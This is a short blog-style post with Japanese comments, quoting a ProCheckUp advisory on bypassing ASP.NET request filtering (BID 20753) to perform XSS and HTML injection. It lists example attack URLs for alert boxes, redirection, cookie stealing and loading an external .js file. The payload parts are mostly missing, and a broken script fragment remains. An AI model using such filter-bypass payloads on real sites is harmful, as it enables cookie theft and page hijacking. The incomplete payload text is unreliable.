Microsoft .NET request filtering bypass vulnerability (BID 20753)

ASP.NETでリクエストフィルタが可能とのこと。

By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET request filtering and perform XSS and HTML injection attacks.
It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP .NET application setup in a test environment. ProCheckUp has also found this issue to be exploitable while carrying out penetration tests on several customer's live environments.

Expressionネタ見たいですね。

Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer)
http://target/vuln-search.aspx?term=

Redirection Attack
http://target/vuln-search.aspx?term=

Cookie stealing
http://target/vuln-search.aspx?term=

Unrestricted HTML injection from external '.js' file
http://target/vuln-search.aspx?term=

er/xss.js"))>